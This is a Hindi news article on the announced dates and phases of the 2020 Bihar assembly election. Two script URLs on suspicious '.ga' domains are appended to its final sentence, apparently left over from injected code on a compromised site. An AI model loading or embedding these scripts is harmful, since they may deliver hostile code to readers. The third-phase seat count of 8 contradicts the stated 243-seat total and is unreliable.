बिहार विधानसभा चुनाव को लेकर एक बड़ी खबर सामने आ रही है। बताया जा रहा है कि बिहार विधानसभा चुनाव 2020 की तारीख को को लेकर ऐलान कर दिया गया है। चुनाव आयोग ने दोपहर 12:30 बजे दिल्ली में विज्ञान भवन में प्रेस कांफ्रेंस करके 243 सीटों वाली विधानसभा के चुनाव की तारीखों का ऐलान कर दिया है।
चुनाव आयोग ने बताया है कि कोरोना के चलते तीन चरणों में ही विधानसभा चुनाव संपन्न किए जाएंगे। पहले चरण में 16 जिलों में 71 सीटों पर वोटिंग होगी, दूसरे चरण में 16 जिलों में 94 सीटों पर और आखरी यानी के तीसरे चरण में 15 जिलों में से 8 सीटों पर वोटिंग करी जाएगी। चुनाव आयोग ने तीनों चरणों की तारीखों का भी ऐलान कर दिया है। बताया जा रहा है कि पहले दौर की वोटिंग 28 अक्टूबर को होगी दूसरे दौर की वोटिंग 3 नवंबर को और अंतिम यानी के तीसरे दौर की वोटिंग 7 नवंबर को होगी।
चुनाव आयोग ने चुनाव के नतीजों के लिए भी तारीखों का ऐलान कर दिया है। वोटिंग के नतीजे 10 नवंबर को ऐलान कर दिए जाएंगे। आपको बता दें कि 2015 में हुए बिहार विधानसभा चुनाव की घोषणा उस साल चुनाव आयोग ने सितंबर के पहले पखवाड़े में की थी और उस साल अक्तूबर तथा नवंबर के दौरान 5 चरणों में बिहार का चुनाव हुआ था।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms